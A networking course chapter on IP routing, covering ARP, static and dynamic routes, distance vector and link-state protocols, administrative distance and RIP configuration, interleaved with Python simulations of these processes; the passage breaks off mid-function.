Note: If a Default Gateway is not configured for Node 1, then Node 1 will not be able to communicate with Node 2. In fact, if a Default Gateway is not configured and Node 1 attempts to ping Node 2, it should receive a message stating that the destination host is unreachable. For a ping to be successful across a routed network such as the one in this example, Node 2 should also have an appropriate Default Gateway in its IP configuration. If Node 2 exists but is not configured with a Default Gateway, and Node 1 attempts to ping Node 2, Node 1 should receive a message stating that the request timed out.

These examples are geared towards TCP/IP as a protocol, and we will use TCP/IP throughout this lesson. IP addressing is the primary example of Network layer addressing used today.

ARP Broadcast Between Two Nodes on Different Networks
Figure 5-3: This example shows the process of a router returning the ARP request of a remote node.

LAN-to-LAN Routing Process

The process of moving data from one host to another and from LAN to LAN is not complex. In the example shown in Figure 5-4, there is one router connecting two networks. There are two hosts defined, one on either network, using TCP/IP.

Two Networks Connected by a Single Router
Figure 5-4: Two networks connected by a single router.

From this diagram, you can see the networks are connected via a single router. Both interfaces are Ethernet interfaces, and the IP addresses are given. In this example, Node 7 is trying to get a packet to Node 10. Since the nodes are on different networks, the packet will need to be routed to reach its goal.

An Ethernet packet will be generated at Node 7 with the IP source address 10.0.10.115 and the source MAC address of Node 7. The destination IP address will be 20.0.20.207, with the destination MAC address still unknown.

When the router hears the request for the MAC address of host 20.0.20.207, it replies to Node 7 with its MAC address. Node 7 then sends the packet to the router with a destination IP address of 20.0.20.207 and the MAC address of the E0 interface of the router. Once the router receives the packet, it in turn sends a broadcast for the MAC address of 20.0.20.207. Node 10 responds to this request, and the router receives the response. A new packet is then generated by the router, addressed to IP address 20.0.20.207 from IP address 10.0.10.115, with the source MAC address of the router and the destination MAC address of Node 10. Node 10 receives the packet and responds, following the same steps.

LAN-to-WAN Routing Process

The LAN-to-WAN routing process is not much different from the previous example; there are simply more steps involved, and the packet may change encapsulations along the way from Ethernet to something else and back to Ethernet. In the example shown in Figure 5-5, there is a routed network with two LANs connected via multiple routers in a WAN configuration.

Two Nodes Connected in a WAN Configuration
Figure 5-5: Two end nodes connected over multiple routers in a WAN configuration.

For a packet to get from Node 7 to Node 10 in this configuration, there are several steps that must happen:
1. Node 7 creates a request for the MAC address of node 50.0.50.150.
2. The router connected to Network 10.0.10.0 sees this request, and realizes it is the path to the destination network. It replies to Node 7 with its MAC address.
3. Node 7 creates a packet with the source IP address of 10.0.10.115 and the destination IP address of 50.0.50.150, a source MAC of Node 7, and a destination MAC of the network 10.0.10.0 router.
4. As the local router receives the packet, the IP source and destination addresses do not change. The encapsulation may change to fit the wire, PPP or Frame Relay for example.
5. The packet is sent from one router to another; at each hop the IP addresses do not change.
6. Once the packet reaches the router for segment 50.0.50.0, the encapsulation is removed, and you are left with an Ethernet packet with source IP address 10.0.10.115 and destination IP address 50.0.50.150, a source MAC of the local E0 interface of the local router, and a destination MAC address of Node 10.
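The ARP decision and the per-hop MAC rewrite described in the ARP Process and LAN-to-LAN sections, as a small simulation that can be run and inspected. This is an added example and not part of the course; it follows the Default Gateway variant of the ARP Process section (Node 7 ARPs for its gateway rather than for the remote host), and the subnet masks, MAC addresses and the router's interface addresses are constructed, as is the two-frame trace it produces.

```python
"""Simulate the ARP decision and hop-by-hop MAC rewrite of the LAN-to-LAN example
(Node 7 at 10.0.10.115 sending to Node 10 at 20.0.20.207 through one router).
Added example, not from the course; it follows the Default Gateway variant of the
ARP Process section. Masks, MACs and the router's interface addresses are made up."""


def to_int(dotted):
    a, b, c, d = (int(part) for part in dotted.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d


def same_network(ip_a, ip_b, mask):
    """The lesson's AND test: both addresses ANDed with the sender's subnet mask."""
    return (to_int(ip_a) & to_int(mask)) == (to_int(ip_b) & to_int(mask))


class Segment:
    """One broadcast domain: an ARP request reaches every attached interface."""
    def __init__(self, name):
        self.name, self.attached = name, {}  # mac -> (ip, device)

    def attach(self, ip, mac, device):
        self.attached[mac] = (ip, device)

    def arp(self, target_ip):
        """Broadcast 'who has target_ip?'; only the owner answers with its MAC."""
        return next((mac for mac, (ip, _) in self.attached.items() if ip == target_ip), None)


class Host:
    def __init__(self, name, ip, mask, mac, gateway, segment):
        self.name, self.ip, self.mask, self.mac = name, ip, mask, mac
        self.gateway, self.segment, self.arp_cache = gateway, segment, {}
        segment.attach(ip, mac, self)

    def next_hop_mac(self, dst_ip):
        """Local destination: ARP for it. Remote: ARP for the Default Gateway instead."""
        if same_network(self.ip, dst_ip, self.mask):
            target = dst_ip
        elif self.gateway is None:
            raise LookupError("Destination host unreachable: no Default Gateway configured")
        else:
            target = self.gateway
        if target not in self.arp_cache:  # replies are stored for future use
            mac = self.segment.arp(target)
            if mac is None:
                raise LookupError(f"no ARP reply for {target}")
            self.arp_cache[target] = mac
        return self.arp_cache[target]


class Router:
    def __init__(self, name, interfaces):  # interfaces: [(ip, mask, mac, segment), ...]
        self.name, self.interfaces = name, interfaces
        for ip, _mask, mac, segment in interfaces:
            segment.attach(ip, mac, self)

    def forward(self, frame):
        """Re-encapsulate for the next segment: IP addresses stay, MACs are rewritten."""
        for ip, mask, mac, segment in self.interfaces:
            if same_network(ip, frame["dst_ip"], mask):
                dst_mac = segment.arp(frame["dst_ip"])
                if dst_mac is None:
                    raise LookupError(f"{self.name}: no ARP reply for {frame['dst_ip']}")
                return {**frame, "src_mac": mac, "dst_mac": dst_mac}
        raise LookupError(f"{self.name}: no connected network for {frame['dst_ip']}")


def trace(src, dst_ip):
    """Follow one packet from src; return the Ethernet frame seen on each segment."""
    frame = {"src_ip": src.ip, "dst_ip": dst_ip,
             "src_mac": src.mac, "dst_mac": src.next_hop_mac(dst_ip)}
    frames, segment = [frame], src.segment
    while True:
        _ip, device = segment.attached[frame["dst_mac"]]
        if isinstance(device, Host):
            return frames
        frame = device.forward(frame)
        segment = next(s for _i, _m, m, s in device.interfaces if m == frame["src_mac"])
        frames.append(frame)


def ping(src, dst):
    """The lesson's note: no gateway at the sender gives 'host unreachable'; no gateway
    at the target means the echo arrives but the reply cannot, so the request times out."""
    outbound = trace(src, dst.ip)
    try:
        reply = trace(dst, src.ip)
    except LookupError:
        raise TimeoutError("Request timed out") from None
    return outbound, reply


def build_lab():
    """Figure 5-4's two networks; the router's addresses and every MAC are constructed."""
    net10, net20 = Segment("10.0.10.0"), Segment("20.0.20.0")
    router = Router("Router", [("10.0.10.1", "255.255.255.0", "00:00:0c:00:e0:00", net10),
                               ("20.0.20.1", "255.255.255.0", "00:00:0c:00:e1:00", net20)])
    node7 = Host("Node 7", "10.0.10.115", "255.255.255.0", "00:d0:09:00:00:07", "10.0.10.1", net10)
    node10 = Host("Node 10", "20.0.20.207", "255.255.255.0", "00:d0:09:00:00:10", "20.0.20.1", net20)
    return router, node7, node10
```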

TASK 5B-1
Performing IP and MAC Analysis
Setup: You are logged on to Windows 2000 as the renamed Administrator account.
1. On your course CD-ROM, navigate to the \085545\Data\Captures folder, and open the ping-arp-mac.cap file. The file should open in Network Monitor.
2. Quickly scroll through the main capture, noting the frames and their functions. You will see it is a capture of an initial ARP process, then two consecutive pings (Echo and Echo:Reply) packets.
3. Expand Frame Four.
4. Record the source and destination IP addresses and the source and destination MAC addresses here:
   Source IP address: 172.16.10.1.
   Destination IP address: 172.17.10.1.
   Source MAC address: 00 D0 09 7F 0D 73.
   Destination MA address: 00 00 0C 8D B8 54.
   If you need to, expand IP and Ethernet so that you can see the addresses.
5. Expand Frame Five, and record those IP and MAC addresses as well.
   Source IP address: 172.17.10.1.
   Destination IP address: 172.16.10.1.
   Source MAC address: 00 00 0C 8D B8 54.
   Destination MAC address: 00 D0 09 7F 0D 73.
6. Observe that, when pinging 172.17.10.1 from 172.16.10.1, the destination MAC address is 00000C8DB854.
7. Examine the exchanges in frames 6 and 7, 8 and 9, and 10 and 11 to see the ping process complete.
8. Expand Frame Twelve, and record those IP and MAC addresses as well.
   Source IP address: 172.16.10.1.
   Destination IP address: 172.18.10.1.
   Source MAC address: 00 D0 09 7F 0D 73.
   Destination MAC address: 00 00 0C 8D B8 54.
9. Expand Frame Thirteen, and record those IP and MAC addresses as well.
   Source IP address: 172.18.10.1.
   Destination IP address: 172.16.10.1.
   Source MAC address: 00 00 0C 8D B8 54.

   Destination MAC address: 00 D0 09 7F 0D 73.
10. Observe that when pinging 172.18.10.1 from 172.16.10.1, the destination MAC address is 00000C8DB854.
11. Examine the exchanges in frames 14 and 15, 16 and 17, and 18 and 19 to see the ping process complete.
12. Leave Network Monitor open.

The Routing Process

Figure 5-6 shows a complex network, with many possible paths for the data to take across the network. The routers will have to communicate with each other in order to determine the path for the given situation.

Potential Data Paths
Figure 5-6: Potential paths that data can take to get from one node to another.

In order for the routers to exchange their data, they must have mutual paths of communication. These paths are the actual connections between the routers. By using logical addressing, the routers are able to have defined networks to transmit data on. The logical addressing minimizes the use of broadcasting, with the end result being more bandwidth for data transmission. In Figure 5-7, each segment with a letter is a unique Layer Three network segment.

Logical Network Addressing
Figure 5-7: Logical network addressing used in an internetwork.

Static and Dynamic Routing

In order for the router to be able to make decisions on where data should go, it needs to consult its routing table. The routing table is the list of known networks and the paths used to reach those networks. (Routing tables will be discussed in detail in the next topic.) Every time a packet reaches a router, the router looks up the packet's destination in the routing table to determine the appropriate path. The router must therefore be aware of the other networks and the way to reach them.

The routers use the information about the paths to which they are connected, including the type of connection and the available bandwidth, to determine the routes data will take. For example, the routers might decide that for a packet to get from network A to network N, it should travel from network A to network B to network D to network H to network J to network K to network M to network N. The fastest route is often not the straight path!

Static Routes

Paths can be created either dynamically (automatically) or statically (manually). The first of these two concepts, static routing, is defined here.

A static route is a route that has been manually entered into the router to define the path to a remote network. Although it is not desirable in every situation, static routing has many advantages, such as:

- Precise control over the routes data will take across the network.
- Easy to configure in small networks.
- Reduced bandwidth use, because no routing updates are exchanged between routers.
- Reduced load on the routers, because no routing calculations are required.

From a security standpoint, a router that relies only on static routes also accepts no routing updates, so there is no update for an attacker on the segment to forge.

Figure 5-8 shows a simple network configuration with two routers and their defined networks.

Sample Network for Static Routing

Figure 5-8: Two routers, Finance and Marketing, and the networks they connect.

The configuration fragments for the static routes of the above routers look like the following. Each ip route command names the destination network, its subnet mask, and the next-hop address on the shared 20.0.20.0 segment:

FinanceRouter#config terminal
FinanceRouter(config)#ip route 30.0.30.0 255.255.255.0 20.0.20.2
FinanceRouter(config)#^Z
FinanceRouter#

MarketingRouter#config terminal
MarketingRouter(config)#ip route 10.0.10.0 255.255.255.0 20.0.20.1
MarketingRouter(config)#^Z
MarketingRouter#

Dynamic Routes

From the previous example, you can see that the command syntax is not complex and that entering the static routes does not take a lot of time. However, the previous example is a very small, simple network, and it is because of its simplicity that static routes work there.

When networks become more complex, static routing is not always a reasonable option. If there were a dozen routers, for example, each connected to several networks, maintaining the static routes by hand would become much more complex, and every change would have to be repeated on every router. This is where dynamic routing enters the equation. Dynamic routing protocols can change the configuration of the network when a link goes down. Dynamic routing protocols converge, so that all routers have a consistent view of the network. And dynamic routing protocols have the means to calculate the best path through an internetwork. Dynamic routing protocols use mathematical algorithms to determine routes, and the routers use the protocol to communicate with one another. The routers exchange their information at defined intervals, and these updates are used to make decisions on the routes to take and to reconfigure when required. Because the routers exchange this data frequently, they are able to change paths and update as needed. This flexibility is what makes dynamic routing protocols so desirable. If a router goes down somewhere in the network, the remaining routers will reconfigure and find another way for the data to reach the other side of the network. An example of this is shown in Figure 5-9.

Multiple Data Paths

Figure 5-9: There are several routers and multiple paths data can take across this internetwork.

In the event that Finance Router 2 goes offline, and these routers are using dynamic routing, the other routers will reconfigure themselves to use only the other Finance Router. When the offline router comes back online, the other routers in the network will reconfigure themselves accordingly.

Comparing Routed Protocols and Routing Protocols

One area where people tend to have confusion when dealing with routers is the difference between routed protocols and routing protocols. They are distinctly different. In this section, you will learn to differentiate between the two and draw the boundaries clearly around them, so that you can easily and quickly identify one or the other.

What are Routed Protocols?

Routed protocols are those that provide the addressing information user data needs in order to be transported between and across networks. A routed protocol has enough internal information to define the structure and function of the various fields inside a given packet. For a protocol to be considered a routed protocol, it must have the following characteristics:

- It must contain Network-layer addressing information.
- It must have a method of locating a single host on a given network.

The most common routed protocol of today (and of the last decade) is the Internet Protocol, or IP. Other routed protocols are Novell's IPX/SPX (Microsoft's version of IPX/SPX is NWLink) and AppleTalk. TCP/IP, IPX/SPX, and AppleTalk all provide addressing at the Network layer of the OSI model.

What are Routing Protocols?

While a routed protocol carries user data from one host to another, a routing protocol carries information about networks between routers, so that each router learns how to reach networks that lie across multiple routers. The routing protocol is the method of transmitting routing updates and messages between routers.

Routers use their assigned routing protocols to create, maintain, and exchange routing data. What the routing protocol learns is placed in the routing table, and it is the routing table that the router then consults to forward data packets from one network to another, including the decision on which path is the best path for the data to take. Routing protocols are also how routers learn the status and configuration of networks they are not directly connected to. In addition to learning about remote networks, a router uses its routing protocol to tell remote routers about the networks that those routers are not directly connected to. Regardless of the routing protocol chosen, the routers must have consistent and open communication with each other in order to maintain a reliable picture, or map, of the network. It is this map of the network that all the routers use to forward data packets from network to network. Some examples of routing protocols are RIP (Routing Information Protocol), IGRP (Interior Gateway Routing Protocol), and OSPF (Open Shortest Path First). Whether the protocol used is RIP, IGRP, or OSPF, it is important to remember that no end-user data is carried by the routing protocol messages. The user data is carried by the routed protocol.

The Routing Protocols

The last area to cover in this topic is the actual protocols themselves. Here, we will discuss the common types of protocols and look at some examples of the protocols in action. The two common types of protocols are Distance Vector and Link-State. Regardless of whether the protocol is Distance Vector or Link-State, for dynamic routing to function, two critical router functions must exist:

- An updated and consistent routing table.
- Scheduled updates between routers.

For the routing protocols to perform these two critical processes, they must conform to a given set of rules. These rules are part of the operation of the routing protocol. Examples of what these rules define include:

- The frequency of updates between routers.
- The amount of data contained in the updates.
- The process of finding the proper recipients of the router data.

Calculating the different data paths, and ultimately choosing the most efficient one based on the given protocol, requires a defined formula. In the case of routers, this formula is known as a routing algorithm. The routing algorithm is responsible for the actual calculation that determines the path data will take as it moves throughout the network. To make this calculation, the algorithm uses certain variables to create what is known as a metric. The metric is then what is used in path determination. Some of the variables that are used to create the overall metric of a given path are:

- Hop Count: The number of routers that a data packet must pass through to reach its destination. The fewer the hops, the shorter the path is considered to be, and therefore the better the path.
- Cost: The cost of a link can be defined by the administrator or calculated by the router. Generally, the lower the cost, the faster the route.
- Bandwidth: This variable is defined by the overall bandwidth that the link provides.
- MTU (Maximum Transmission Unit): The MTU is the largest message size (in octets) that a link will route.
- Load: This variable is based on how busy the path is, in terms of the amount of traffic the router must process and make forwarding decisions on.

metric: A random variable x representing a quantitative measure accumulated over a period.

Regardless of the routing protocol chosen, there is no single rule for selecting the best protocol based on its algorithm. The routing protocol must adapt to the network in the event there are network changes, and both Distance Vector and Link-State have this ability. When the routers change their tables based on update information from the routing protocol, this is called convergence. When all routers have the same view of the network, the network is converged. It is the goal of all routing protocols to have fast convergence, so that the routers maintain a consistent view of the routes available to network segments and do not use incorrect data to make routing decisions.

Distance Vector Routing

Distance Vector routing calculates the distance to a given network segment and the direction (or vector) required to reach the segment. The Distance Vector algorithm (Bellman-Ford) is designed to pass the routing table from neighbor to neighbor. The passing of the routing table is called the update between routers. In the event of a topology change, such as a router going offline, an update is sent immediately from one router to another.

Routers Passing the Routing Table

In Distance Vector routing, the routing table is passed between routers along the shared segments. In Figure 5-10, Router A and Router B share their routing tables over the segment between them, out Interface E2 of Router A and out Interface E0 of Router B.

Figure 5-10: Routers passing the routing table.

Routing Table with Hop Counts

When a router receives an update, it adds any new information on how to get to new networks, or better paths (lower hop counts) to networks it already knows. The algorithm adds one hop to the hop count for every router that must be crossed to reach the destination.  Figure 5-11 shows a basic routing table with hop counts included.

Figure 5-11: A routing table with interfaces defined and hop counts. In this example, the routing table has been created and convergence has been achieved. Both routers have a consistent view of the network, and the routing tables define the path to the networks and the interface to forward packets out to reach the required destinations.

topology: The map or plan of the network. The physical topology describes how the wires or cables are laid out, and the logical or electrical topology describes how the information flows.
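The neighbor-to-neighbor table exchange, the one-hop increment, and the reconvergence after a router fails (the Figure 5-9 situation) can be followed in code. The following Python simulation is an added example and is not part of the course material; the four-router topology, interface names and network numbers are constructed, and hop count is the only metric, as in RIP.

```python
"""Distance Vector routing (Bellman-Ford) between neighbors, as an added example.

The topology is constructed along the lines of Figure 5-9: LEFT reaches RIGHT
through two parallel routers, FIN1 and FIN2. Each router passes its whole
routing table to its neighbors; a neighbor installs a route when the
advertised hop count plus one beats what it already holds.
"""

INFINITY = 16  # RIP's "unreachable" hop count

# router -> {directly connected network: outgoing interface}  (constructed)
CONNECTED = {
    "LEFT":  {"172.16.0.0/16": "E0", "192.168.1.0/24": "S0", "192.168.2.0/24": "S1"},
    "FIN1":  {"192.168.1.0/24": "S0", "192.168.3.0/24": "S1"},
    "FIN2":  {"192.168.2.0/24": "S0", "192.168.4.0/24": "S1"},
    "RIGHT": {"192.168.3.0/24": "S0", "192.168.4.0/24": "S1", "172.18.0.0/16": "E0"},
}


def initial_tables(connected):
    """Every router starts out knowing only its own segments, at 0 hops.
    Table entry: network -> (hops, outgoing interface, neighbor learned from)."""
    return {r: {net: (0, iface, None) for net, iface in nets.items()}
            for r, nets in connected.items()}


def adjacencies(connected):
    """(receiver, sender, shared segment) for every pair of routers on one segment."""
    adj = []
    for r1, n1 in connected.items():
        for r2, n2 in connected.items():
            if r1 != r2:
                for seg in n1.keys() & n2.keys():
                    adj.append((r1, r2, seg))
    return adj


def exchange(tables, connected, max_rounds=10):
    """Run periodic updates until no table changes. Returns the number of rounds used."""
    for rnd in range(1, max_rounds + 1):
        changed = False
        snapshot = {r: dict(t) for r, t in tables.items()}  # what each router advertises this round
        for receiver, sender, seg in adjacencies(connected):
            out_iface = connected[receiver][seg]
            for net, (hops, _, _) in snapshot[sender].items():
                candidate = min(hops + 1, INFINITY)  # one hop added per router crossed
                current = tables[receiver].get(net)
                if current is None or candidate < current[0]:
                    tables[receiver][net] = (candidate, out_iface, sender)
                    changed = True
                elif current[2] == sender and candidate != current[0]:
                    # The neighbor we learned this route from now reports a different
                    # distance: follow it even if worse, so that withdrawals propagate.
                    tables[receiver][net] = (candidate, out_iface, sender)
                    changed = True
        if not changed:
            return rnd
    return max_rounds


def router_down(tables, connected, name):
    """Model the invalidation timer expiring: routes learned via `name` become unreachable."""
    del connected[name]
    del tables[name]
    for table in tables.values():
        for net, (hops, iface, via) in list(table.items()):
            if via == name:
                table[net] = (INFINITY, iface, None)


def best_route(tables, router, net):
    """(hops, interface, learned-from) for `net` on `router`, or None if unreachable."""
    entry = tables[router].get(net)
    return None if entry is None or entry[0] >= INFINITY else entry


if __name__ == "__main__":
    connected = {r: dict(n) for r, n in CONNECTED.items()}
    tables = initial_tables(connected)
    print("converged after", exchange(tables, connected), "rounds")
    print("LEFT -> 172.18.0.0/16:", best_route(tables, "LEFT", "172.18.0.0/16"))
    router_down(tables, connected, "FIN1")
    print("after FIN1 down:", best_route(tables, "LEFT", "172.18.0.0/16"))
    exchange(tables, connected)
    print("after reconvergence:", best_route(tables, "LEFT", "172.18.0.0/16"))
```

Run it and watch LEFT's entry for 172.18.0.0/16 go from 2 hops via FIN1, to unreachable, to 2 hops via FIN2. The elif branch is the detail worth noticing: a router has to accept a worse distance from the neighbor it learned a route from, otherwise withdrawals would never propagate and stale routes would survive a failure.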

Link-State Routing

Where Distance Vector routing uses hop counts to make path decisions in the routing table, Link-State routing uses a more complex metric system. In Link-State routing, all routers maintain a consistent view of the network, as they do in Distance Vector routing, but they are also all aware of the complete network topology. Link-State routers know each network segment and the different options for reaching each segment. Convergence is just as critical in Link-State routing, and in order to have a converged network, there are steps that must be followed. Figure 5-12 shows a complex network, and after the diagram, the steps for convergence are outlined.

Sample Network for Link-State Routing

Figure 5-12: In this complex network, 7 routers and 14 network segments are defined.

The steps for network convergence are as follows:

1. The routers identify the routers that are their direct neighbors. For example, Router 3 will identify Router 6 and Router 4 as neighbors.
2. The routers send LSPs (Link State Packets) to the network. The LSPs contain data on which networks the router can reach. For example, Router 7 would send LSPs indicating that Router 7 is connected to segments 10.0.0.0, 11.0.0.0, 12.0.0.0, and 14.0.0.0.
3. The routers in the network accept all the LSPs and build a topology database of the network. The LSPs from all routers are used to build this consistent view.
4. The SPF (Shortest Path First) algorithm is used to determine the accessibility of each network and the shortest path between networks. The SPF algorithm is executed on all routers, so that they all end up with the same topology view of the network.
5. Each router uses its SPF calculations to determine the best (shortest) path from itself to each destination network on the internetwork, and places those paths in its routing table.
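The five steps above, as an added Python example that is not part of the course text: each router's LSP is a dictionary of the segments it attaches to, the flooded LSPs form the topology database, and Dijkstra's shortest path first algorithm is run from one router. The routers, segments and link costs are constructed; the cost model (a router pays the cost of its own link when forwarding onto a segment, and crossing the segment to another router costs nothing extra) follows the way OSPF assigns cost to outgoing interfaces.

```python
"""Link-State routing: flooding LSPs, building the topology database, running
SPF. An added example, not from the course text; the routers, segments and
link costs are constructed.

Every router floods an LSP naming the segments it attaches to and the cost of
each link. All routers build the same database and each runs SPF (Dijkstra)
from itself, so the topology view is shared but the next hops are its own.
"""
import heapq

# LSPs as flooded: router -> {segment: cost of the router's link onto it}  (constructed)
LSPS = {
    "R1": {"10.0.0.0/8": 1, "11.0.0.0/8": 10},
    "R2": {"10.0.0.0/8": 1, "12.0.0.0/8": 1},
    "R3": {"12.0.0.0/8": 1, "13.0.0.0/8": 1},
    "R4": {"11.0.0.0/8": 10, "13.0.0.0/8": 1, "14.0.0.0/8": 1},
}


def build_database(lsps):
    """Topology database: segment -> {router: link cost}. Identical on every router."""
    db = {}
    for router, links in lsps.items():
        for seg, cost in links.items():
            db.setdefault(seg, {})[router] = cost
    return db


def spf(lsps, source):
    """Dijkstra from `source`. Returns {segment: (total cost, first-hop router or None)},
    where None means the segment is directly connected. A router pays its link cost
    to forward onto a segment; reaching another router across that segment is free."""
    db = build_database(lsps)
    best_router = {source: 0}          # router -> lowest cost found so far
    best_seg = {}                      # segment -> (cost, first hop)
    heap = [(0, source, None)]         # (cost, router, first hop used to get there)
    while heap:
        cost, router, first = heapq.heappop(heap)
        if cost > best_router[router]:
            continue                   # stale entry; a cheaper path was already settled
        for seg, link_cost in lsps[router].items():
            seg_cost = cost + link_cost
            if seg not in best_seg or seg_cost < best_seg[seg][0]:
                best_seg[seg] = (seg_cost, first)
            for nbr in db[seg]:        # every other router attached to this segment
                if nbr == router:
                    continue
                nbr_first = nbr if first is None else first
                if nbr not in best_router or seg_cost < best_router[nbr]:
                    best_router[nbr] = seg_cost
                    heapq.heappush(heap, (seg_cost, nbr, nbr_first))
    return best_seg


def withdraw(lsps, router):
    """Topology after `router` fails: its LSP ages out of every database."""
    return {r: dict(links) for r, links in lsps.items() if r != router}


if __name__ == "__main__":
    for seg, (cost, via) in sorted(spf(LSPS, "R1").items()):
        print(f"R1 -> {seg:12} cost {cost:2} via {via or 'connected'}")
    print("after R2 fails:", spf(withdraw(LSPS, "R2"), "R1")["13.0.0.0/8"])
```

From R1, segment 13.0.0.0/8 costs 3 through R2 even though the direct link to R4 is one hop closer, which is the difference between a cost metric and a hop count. Withdrawing R2's LSP and rerunning SPF gives the converged view after that router fails: the same database on every router, a different first hop computed by each.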

Common Protocols

Here is a quick list of common routing protocols used on Cisco routers:

- RIP (Routing Information Protocol) is a Distance Vector protocol that uses hop count as its metric.
- IGRP (Interior Gateway Routing Protocol) is a Cisco Distance Vector protocol that uses a composite metric for routing decisions.
- EIGRP (Enhanced Interior Gateway Routing Protocol) is an enhanced version of IGRP that combines properties of Link-State and Distance Vector protocols.
- OSPF (Open Shortest Path First) is a Link-State protocol that commonly replaces RIP in growing internetworks.
- BGP (Border Gateway Protocol) is an interdomain routing protocol often used by Internet Service Providers.
- RTMP (Routing Table Maintenance Protocol) is Apple's routing protocol for AppleTalk. RTMP routers dynamically update topology changes in the network.

Administrative Distances

As the router has the ability to use static routes, dynamic routes, and multiple protocols, the ability to see the current routing table becomes even more critical as the network's complexity increases. There is a function in the router called administrative distance. The administrative distance function has one obvious use, and that is deciding between routes when two or more methods in the router are aware of a path to the same destination. For example, if you entered a static route on how to get to a location, and then RIP identified a route to that location, which route should the router use?

This is where the administrative distance comes into play. The lower the value, the higher the level of trust the router places in that route. Some default administrative distances are listed in the following table.

Default Administrative Distances

Route Type                     Distance
Directly connected interface   0
Static route                   1
IGRP route                     100
OSPF route                     110
RIP route                      120

Therefore, if you had a static route and a RIP route to the same destination, the static route would be the one the router uses. When viewing the routing table, not only will you be shown the current routes to destination networks, but you will also see the method by which each route was learned. The following fragments show a portion of the routing tables for three routers in a network:

LEFT#show ip route
R 192.168.10.0/24 [120/1] via 192.168.20.2, 00:00:13, Serial1
C 192.168.20.0/24 is directly connected, Serial1
C 172.16.0.0/16 is directly connected, Ethernet0
R 172.17.0.0/16 [120/1] via 192.168.20.2, 00:00:13, Serial1
R 172.18.0.0/16 [120/2] via 192.168.20.2, 00:00:13, Serial1

CENTER#show ip route
C 192.168.10.0/24 is directly connected, Serial1
C 192.168.20.0/24 is directly connected, Serial0
R 172.16.0.0/16 [120/1] via 192.168.20.1, 00:00:13, Serial0
C 172.17.0.0/16 is directly connected, Ethernet0
R 172.18.0.0/16 [120/1] via 192.168.10.1, 00:00:18, Serial1

RIGHT#show ip route
C 192.168.10.0/24 is directly connected, Serial0
R 192.168.20.0/24 [120/1] via 192.168.10.2, 00:00:20, Serial0
R 172.16.0.0/16 [120/2] via 192.168.10.2, 00:00:20, Serial0
R 172.17.0.0/16 [120/1] via 192.168.10.2, 00:00:20, Serial0
C 172.18.0.0/16 is directly connected, Ethernet0

In these fragments, you can identify the routes on each router. You can also identify which routes are directly connected and which are learned using RIP. The way you identify this is by the letter in front of each route. In these examples, all routes with a C are connected interfaces, and routes with an R are learned via RIP. If a route had been entered statically, it would have an S in front of it.

For the RIP routes shown, note that the number 120 is displayed in brackets after the route. The 120 is the administrative distance of the route. The number following the slash is the metric, which for RIP is the hop count.

RIP

RIP, or the Routing Information Protocol, is one of the most straightforward routing protocols that can be implemented. It also has no significant security, is broadcast-based, and is noisy.

RIP functions by informing neighboring routers of the networks that the current router can reach. The advertised routes come directly from the simple configuration used to set up RIP on the router: each network statement both enables RIP on the interfaces in that network and causes the network to be advertised.

The following configuration fragments show the configuration of RIP on three routers, LEFT, RIGHT, and CENTER. The network statements name the networks each router is directly connected to, matching the routing tables shown above:

LEFT#configure terminal
LEFT(config)#router rip
LEFT(config-router)#network 172.16.0.0
LEFT(config-router)#network 192.168.20.0
LEFT(config-router)#^Z
LEFT#

RIGHT#configure terminal
RIGHT(config)#router rip
RIGHT(config-router)#network 172.18.0.0
RIGHT(config-router)#network 192.168.10.0
RIGHT(config-router)#^Z
RIGHT#

CENTER#configure terminal
CENTER(config)#router rip
CENTER(config-router)#network 172.17.0.0
CENTER(config-router)#network 192.168.10.0
CENTER(config-router)#network 192.168.20.0
CENTER(config-router)#^Z
CENTER#
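The show ip route output and the administrative distance table can be turned into a small route-selection model. The Python below is an added example, not part of the course text: it parses lines in the show ip route format shown above, picks the route that would be installed when a static route and a RIP route claim the same prefix, and then resolves a destination address with the longest prefix match that forwarding uses. SAMPLE is constructed from LEFT's table with one static route added; the route codes, default distances and field layout are the ones shown in the text.

```python
"""Reading `show ip route` and applying administrative distance, as an added example.

SAMPLE is constructed from the LEFT router's table above, with one static route
added so that two sources (static and RIP) claim the same prefix. Default
administrative distances follow the table in the text.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Optional

DEFAULT_AD = {"C": 0, "S": 1, "I": 100, "O": 110, "R": 120}

SAMPLE = """\
LEFT#show ip route
R    192.168.10.0/24 [120/1] via 192.168.20.2, 00:00:13, Serial1
C    192.168.20.0/24 is directly connected, Serial1
C    172.16.0.0/16 is directly connected, Ethernet0
R    172.17.0.0/16 [120/1] via 192.168.20.2, 00:00:13, Serial1
R    172.18.0.0/16 [120/2] via 192.168.20.2, 00:00:13, Serial1
S    172.18.0.0/16 [1/0] via 192.168.20.2
"""

ROUTE_RE = re.compile(
    r"^(?P<code>[A-Z])\s+(?P<prefix>\d+\.\d+\.\d+\.\d+/\d+)\s+"
    r"(?:\[(?P<ad>\d+)/(?P<metric>\d+)\]\s+via\s+(?P<nexthop>\d+\.\d+\.\d+\.\d+)"
    r"(?:,\s*(?P<age>\d\d:\d\d:\d\d))?(?:,\s*(?P<iface>\S+))?"
    r"|is directly connected,\s*(?P<ciface>\S+))\s*$"
)


@dataclass(frozen=True)
class Route:
    code: str                          # C, S, R, ... as printed at the start of the line
    prefix: ipaddress.IPv4Network
    ad: int                            # administrative distance: how much the source is trusted
    metric: int                        # the protocol's own measure (hop count for RIP)
    nexthop: Optional[str]
    iface: Optional[str]


def parse_show_ip_route(text):
    """Route lines only; the prompt, the codes legend and summary lines are skipped."""
    routes = []
    for line in text.splitlines():
        m = ROUTE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        net = ipaddress.ip_network(d["prefix"])
        if d["ciface"]:
            routes.append(Route(d["code"], net, 0, 0, None, d["ciface"]))
        else:
            routes.append(Route(d["code"], net, int(d["ad"]), int(d["metric"]),
                                d["nexthop"], d["iface"]))
    return routes


def install(candidates):
    """Which of several routes to the same prefix enters the table: lowest
    administrative distance wins; metric only breaks ties within one source."""
    return min(candidates, key=lambda r: (r.ad, r.metric))


def build_table(routes):
    """Group by prefix and keep the one route per prefix that install() picks."""
    by_prefix = {}
    for r in routes:
        by_prefix.setdefault(r.prefix, []).append(r)
    return [install(c) for c in by_prefix.values()]


def lookup(table, destination):
    """Forwarding decision for one packet: longest prefix match over installed routes."""
    dst = ipaddress.ip_address(destination)
    matches = [r for r in table if dst in r.prefix]
    return max(matches, key=lambda r: r.prefix.prefixlen) if matches else None


def unexpected_distance(routes):
    """Routes whose printed distance differs from the default for their code: someone
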